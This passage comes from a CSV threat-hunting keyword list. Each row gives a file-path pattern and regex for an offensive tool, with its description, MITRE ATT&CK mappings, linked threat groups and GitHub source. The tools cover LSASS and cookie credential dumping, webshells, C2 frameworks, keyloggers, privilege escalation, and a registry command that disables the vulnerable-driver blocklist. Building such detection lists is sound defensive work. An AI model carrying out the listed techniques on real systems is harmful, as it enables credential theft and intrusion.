TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","19183" "*\SwampThing.csproj*","SwampThing\.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19184" "*\SweetPotato.dll*",".{0,1000}\\SweetPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","19185" "*\SweetPotato.dll*",".{0,1000}\\SweetPotato\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19186" "*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - 
T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19187" "*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19188" "*\Sweetpotato.exe*",".{0,1000}\\Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19189" "*\SweetPotato\Program.cs*",".{0,1000}\\SweetPotato\\Program\.cs.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19190" "*\SweetPotato-master.zip*",".{0,1000}\\SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19191" "*\SwitchPriv.exe*",".{0,1000}\\SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19192" "*\SwitchPriv.sln*",".{0,1000}\\SwitchPriv\.sln.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19193" "*\swodniW\:C*",".{0,1000}\\swodniW\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19194" "*\sysDb-dmp*",".{0,1000}\\sysDb\-dmp.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","19196" 
"*\SYSTEM\CurrentControlSet\Control\CI\Config\ -Name VulnerableDriverBlocklistEnable 0*",".{0,1000}\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\\\s\-Name\sVulnerableDriverBlocklistEnable\s0.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#registry","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","19197" "*\system32\msf.sys*",".{0,1000}\\system32\\msf\.sys.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","19201" "*\systemic.txt",".{0,1000}\\systemic\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","19204" "*\SysWhispersU.exe*",".{0,1000}\\SysWhispersU\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","19205" "*\TakeMyRDP*",".{0,1000}\\TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","19221" "*\TakeMyRDP.pdb*",".{0,1000}\\TakeMyRDP\.pdb.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19222" "*\TaoWu.cna*",".{0,1000}\\TaoWu\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - 
T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19223" "*\Tasks\bypass-clm*",".{0,1000}\\Tasks\\bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","19226" "*\Tasks\lsass.dmp*",".{0,1000}\\Tasks\\lsass\.dmp.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","19227" "*\TASKSHELL.EXE*",".{0,1000}\\TASKSHELL\.EXE.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","19229" "*\Tater.ps1*",".{0,1000}\\Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","19230" "*\TChopper\chopper.*",".{0,1000}\\TChopper\\chopper\..{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19238" 
"*\Tchopper-main.zip*",".{0,1000}\\Tchopper\-main\.zip.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19239" "*\tcp_keylogger.rs*",".{0,1000}\\tcp_keylogger\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19240" "*\TCPMITM.py*",".{0,1000}\\TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","19241" "*\TeamFiltration.dll*",".{0,1000}\\TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19250" "*\TeamFiltration.exe*",".{0,1000}\\TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform 
framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19251" "*\TeamFiltration\OneDriveAPI*",".{0,1000}\\TeamFiltration\\OneDriveAPI.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19252" "*\TeamFiltration\TeamFiltration\*",".{0,1000}\\TeamFiltration\\TeamFiltration\\.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19253" "*\TeamFiltrationConfig_Example.json*",".{0,1000}\\TeamFiltrationConfig_Example\.json.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19254" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in 
the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","19255" "*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","19256" "*\teams_localdb.py*",".{0,1000}\\teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19257" "*\teamsenum.py*",".{0,1000}\\teamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","19258" "*\TeamServer_win.exe*",".{0,1000}\\TeamServer_win\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","19259" 
"*\teamserver-win.zip*",".{0,1000}\\teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","19260" "*\teamstracker.py*",".{0,1000}\\teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","19261" "*\Temp\blah.exe*",".{0,1000}\s\\Temp\\blah\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","19277" "*\Temp\cme_hosted*",".{0,1000}\\Temp\\cme_hosted.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral 
Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19279" "*\Temp\csrss.dmp*",".{0,1000}\\Temp\\csrss\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","19281" "*\temp\dump.txt*",".{0,1000}\\temp\\dump\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19283" "*\Temp\dumpert*",".{0,1000}\\Temp\\dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","19284" "*\Temp\dumpert.dmp*",".{0,1000}\\Temp\\dumpert\.dmp.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","19285" "*\temp\ft.exe*",".{0,1000}\\temp\\ft\.exe.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","19287" "*\temp\hollow.dll*",".{0,1000}\\temp\\hollow\.dll.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","19288" "*\Temp\Impersonate.exe*",".{0,1000}\\Temp\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","19289" "*\temp\Injected.dll*",".{0,1000}\\temp\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege 
escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","19290" "*\Temp\lsass.dmp*",".{0,1000}\\Temp\\lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","19292" "*\temp\lsass.exe*",".{0,1000}\\temp\\lsass\.exe.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","19293" "*\Temp\nxc_hosted*",".{0,1000}\\Temp\\nxc_hosted.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19294" "*\temp\OpenFileShares.txt*",".{0,1000}\\temp\\OpenFileShares\.txt.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - 
